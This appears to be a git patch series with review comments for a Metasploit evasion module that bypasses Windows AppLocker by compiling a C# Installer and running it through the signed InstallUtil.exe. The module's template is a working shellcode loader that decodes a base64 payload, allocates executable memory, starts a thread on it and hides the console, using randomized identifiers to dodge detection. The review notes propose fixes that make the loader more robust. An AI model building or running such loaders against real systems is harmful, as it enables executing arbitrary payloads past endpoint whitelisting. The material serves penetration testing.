C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + 9. `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). ## References From 4a359f5f5e358c4fa683b87d5df8e4e842ddcc79 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 21:19:10 +0100 Subject: [PATCH 13/18] format --- modules/evasion/windows/applocker_evasion_install_util.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 31d52e06ead4..e2adc3da3e12 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -15,7 +15,7 @@ def initialize(info={}) 'Author' => [ 'Nick Tyrer <@NickTyrer>', # module development - 'Casey Smith', # install_util bypass research + 'Casey Smith', # install_util bypass research ], 'License' => MSF_LICENSE, 'Platform' => 'win', From 45db30bd909e31341ca36680b95b6483202a9646 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Fri, 7 Jun 2019 15:02:47 +0100 Subject: [PATCH 14/18] increase randomness to avoid duplicates --- modules/evasion/windows/applocker_evasion_install_util.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index e2adc3da3e12..91949ee821e5 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -48,7 +48,7 @@ def instructions def mod(var) - var = Rex::Text.rand_text_alpha (3) + var = Rex::Text.rand_text_alpha (8) end From 46ebae823134904098b0d389e9b60f91525e9d11 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Sat, 15 Jun 2019 11:06:38 +0100 Subject: [PATCH 15/18] implemented rubocop suggestions --- .../windows/applocker_evasion_install_util.rb | 137 +++++++++--------- 1 file changed, 69 insertions(+), 68 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 91949ee821e5..7e0eda285161 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb 
@@ -6,99 +6,100 @@ class MetasploitModule < Msf::Evasion def initialize(info={}) - super(merge_info(info, - 'Name' => 'Applocker Evasion - .NET Framework Installation Utility', - 'Description' => %q{ - This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. - This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code. - }, - 'Author' => - [ - 'Nick Tyrer <@NickTyrer>', # module development - 'Casey Smith', # install_util bypass research - ], - 'License' => MSF_LICENSE, - 'Platform' => 'win', - 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'Targets' => [ ['Microsoft Windows', {}] ], - 'References' => [ ['URL', 'https://attack.mitre.org/techniques/T1118/'] ] - )) + super( + update_info( + info, + 'Name' => 'Applocker Evasion - .NET Framework Installation Utility', + 'Description' => %( + This module will assist you in evading Microsoft Windows + Applocker and Software Restriction Policies. + This technique utilises the Microsoft signed binary + InstallUtil.exe to execute user supplied code. 
+ ), + 'Author' => + [ + 'Nick Tyrer <@NickTyrer>', # module development + 'Casey Smith' # install_util bypass research + ], + 'License' => 'MSF_LICENSE', + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Microsoft Windows', {}]], + 'References' => [['URL', 'https://attack.mitre.org/techniques/T1118/']] + ) + ) - register_options([ - OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt']) - ]) + register_options( + [ + OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt']) + ] + ) end - def build_payload - esc = Rex::Text.encode_base64(payload.encoded) + Rex::Text.encode_base64(payload.encoded) end - def instructions print_status "Copy #{datastore['FILENAME']} to the target" if payload.arch.first == ARCH_X86 print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' else print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' end end - - def mod(var) - var = Rex::Text.rand_text_alpha (8) + def obfu + Rex::Text.rand_text_alpha 8 end - def install_util esc = build_payload - moda, modb, modc, modd, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), 
mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) + mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu] <<~HEREDOC - using System; - namespace #{Rex::Text.rand_text_alpha 3} - { - public class #{Rex::Text.rand_text_alpha 3} { public static void Main() { } } - [System.ComponentModel.RunInstaller(true)] - public class #{Rex::Text.rand_text_alpha 3} : System.Configuration.Install.Installer - { - private static Int32 #{modh}=0x1000; - private static IntPtr #{modi}=(IntPtr)0x40; - private static UInt32 #{modj} = 0xFFFFFFFF; - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); - [System.Runtime.InteropServices.DllImport("user32.dll")] - static extern bool ShowWindow(IntPtr #{modg}, int nCmdShow); - [System.Runtime.InteropServices.DllImport("Kernel32")] - private static extern IntPtr GetConsoleWindow(); - const int #{modf} = 0; - public override void Uninstall(System.Collections.IDictionary s) - { - IntPtr #{modg}; - #{modg} = GetConsoleWindow(); - ShowWindow(#{modg}, #{modf}); - string #{moda} = "#{esc}"; - byte[] #{modb} = Convert.FromBase64String(#{moda}); - byte[] #{modc} = #{modb}; - IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, #{modh}, #{modi}); - System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length); - IntPtr #{mode} = IntPtr.Zero; - WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), #{modj}); - } - } - } + using System; + namespace #{mod[12]} + { + public class #{mod[11]} { public static void Main() { } } + 
[System.ComponentModel.RunInstaller(true)] + public class #{mod[10]} : System.Configuration.Install.Installer + { + private static Int32 #{mod[0]}=0x1000; + private static IntPtr #{mod[1]}=(IntPtr)0x40; + private static UInt32 #{mod[2]} = 0xFFFFFFFF; + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); + [System.Runtime.InteropServices.DllImport("user32.dll")] + static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow); + [System.Runtime.InteropServices.DllImport("Kernel32")] + private static extern IntPtr GetConsoleWindow(); + const int #{mod[4]} = 0; + public override void Uninstall(System.Collections.IDictionary s) + { + IntPtr #{mod[3]}; + #{mod[3]} = GetConsoleWindow(); + ShowWindow(#{mod[3]}, #{mod[4]}); + string #{mod[5]} = "#{esc}"; + byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]}); + byte[] #{mod[7]} = #{mod[6]}; + IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[0]}, #{mod[1]}); + System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length); + IntPtr #{mod[9]} = IntPtr.Zero; + WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[8]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[2]}); + } + } + } HEREDOC end - def run file_create(install_util) instructions end - end From b7137ea426f1013be87bb64a71eb9c79aca0c792 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Sat, 15 Jun 2019 20:03:17 +0100 Subject: [PATCH 16/18] update module flow --- .../windows/applocker_evasion_install_util.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) 
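Review bot: `'License' => 'MSF_LICENSE'` on the new side replaces the `MSF_LICENSE` constant with a string literal, so the module now declares a license named literally "MSF_LICENSE" instead of the framework's license value; it should read `'License' => MSF_LICENSE,`. Separately, `mod = [obfu, obfu, …]` draws thirteen identifiers independently with no uniqueness check, and the C# template declares several of them in one scope (`mod[0]`–`mod[2]` as fields, `mod[4]` as a constant, `mod[5]`–`mod[9]` as locals of `Uninstall`), so a collision — improbable at eight alphabetic characters, but not excluded — is a compile error on the target; drawing until thirteen distinct names exist closes that, see the sketch below. Unchanged from the old side but worth a one-line comment for operators: the loader allocates with protection `0x40` (PAGE_EXECUTE_READWRITE) and starts a thread directly on that buffer, an RWX pattern that endpoint telemetry commonly flags independently of the AppLocker bypass, e.g. `# RWX allocation + CreateThread on the buffer: a well-known detection heuristic`.
```ruby
        'License' => MSF_LICENSE,
# … unchanged: rest of update_info, register_options, build_payload, instructions, obfu …
  def install_util
    esc = build_payload
    # Thirteen distinct C# identifiers: rand_text_alpha can repeat, and a
    # repeat would declare the same name twice in one scope (compile error).
    mod = []
    until mod.size == 13
      name = obfu
      mod << name unless mod.include?(name)
    end
# … unchanged: HEREDOC with the C# Installer source …
```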
diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 7e0eda285161..8198adaf605a 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -40,17 +40,6 @@ def build_payload Rex::Text.encode_base64(payload.encoded) end - def instructions - print_status "Copy #{datastore['FILENAME']} to the target" - if payload.arch.first == ARCH_X86 - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' - else - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' - end - end - def obfu Rex::Text.rand_text_alpha 8 end @@ -98,6 +87,17 @@ def install_util HEREDOC end + def instructions + print_status "Copy #{datastore['FILENAME']} to the target" + if payload.arch.first == ARCH_X86 + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + else + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + end + end + def run file_create(install_util) instructions 
From 791da38fe43b4c13aff360a901f73fc12be33f4b Mon Sep 17 00:00:00 2001
From: NickTyrer
Date: Sun, 16 Jun 2019 11:39:03 +0100
Subject: [PATCH 17/18] update instructions
---
.../windows/applocker_evasion_install_util.rb | 22 ++++++++++++++-----
1 file changed, 17 insertions(+), 5 deletions(-)
diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb
index 8198adaf605a..d7aec6add78c 100644
--- a/modules/evasion/windows/applocker_evasion_install_util.rb
+++ b/modules/evasion/windows/applocker_evasion_install_util.rb
@@ -87,19 +87,31 @@ def install_util HEREDOC end + def file_format_filename(name = '') + name.empty? ? @fname : @fname = name + end + + def create_files + f1 = datastore['FILENAME'].empty? ? 'install_util.txt' : datastore['FILENAME'] + f1 << '.txt' unless f1.downcase.end_with?('.txt') + file1 = install_util + file_format_filename(f1) + file_create(file1) + end + def instructions print_status "Copy #{datastore['FILENAME']} to the target" if payload.arch.first == ARCH_X86 - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}" else - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}" end end def run - file_create(install_util) + create_files instructions end end From 5a010e14467d25075120ebd95a152eec8a009c7d Mon Sep 17 00:00:00 2001 
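Review bot: The compile and execute lines in `instructions` derive the output name with `datastore['FILENAME'].gsub('.txt', '.exe')`, which replaces every occurrence and is case-sensitive, while `create_files` normalises the name case-insensitively and only for a trailing `.txt`; so `Loader.TXT` is written unchanged but the printed command is `/out:Loader.TXT`, and `drop.txt.bak.txt` becomes `drop.exe.bak.exe`. `f1 << '.txt'` also appends in place to whatever `datastore['FILENAME']` returns — if that is the stored String the option is silently rewritten on each run, and if it is a copy the printed filename no longer matches the file `create_files` wrote; a `.dup` avoids both cases. Deriving both names in `instructions` from `file_format_filename` (the name `create_files` actually registered) with an anchored, case-insensitive `sub(/\.txt\z/i, '.exe')` keeps the written file and the two printed commands in step; sketch below. The `file_format_filename` override looks like a copy of a helper the evasion base class may already provide — worth confirming before keeping it.
```ruby
  def create_files
    f1 = datastore['FILENAME'].to_s.dup   # dup: never append to the datastore's own String
    f1 = 'install_util.txt' if f1.empty?
    f1 << '.txt' unless f1.downcase.end_with?('.txt')
    file_format_filename(f1)
    file_create(install_util)
  end

  def instructions
    src = file_format_filename            # the name create_files actually wrote
    exe = src.sub(/\.txt\z/i, '.exe')     # anchored + case-insensitive, unlike gsub('.txt', '.exe')
    print_status "Copy #{src} to the target"
    if payload.arch.first == ARCH_X86
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:#{exe} #{src}"
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{exe}"
    else
      # … unchanged: Framework64 variant, with #{exe} and #{src} in place of the datastore lookups …
    end
  end
```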
From: NickTyrer
Date: Thu, 20 Jun 2019 16:07:25 +0100
Subject: [PATCH 18/18] update documentation
---
.../evasion/windows/applocker_evasion_install_util.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md
index 9c922f9808ae..78edd5d051d7 100644
--- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md
+++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md
@@ -1,13 +1,13 @@ ## Intro -This module is designed to evade solutions such as software restriction policies and Applocker. +This module is designed to evade solutions such as software restriction policies and Applocker. Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories. -It enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" -The main vector for this bypass is to use the trusted binary InstallUtil.exe which is located within the trusted Windows directory and also has the ability to execute user supplied code. +Applocker enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" +The main vector for this bypass is to use the trusted binary InstallUtil.exe to execute user supplied code as this binary is located within the trusted Windows directory. ## Vulnerable Application -This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active. +This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active, that do not explicitly block InstallUtill.exe or the "Microsoft.Net" directory. ## Options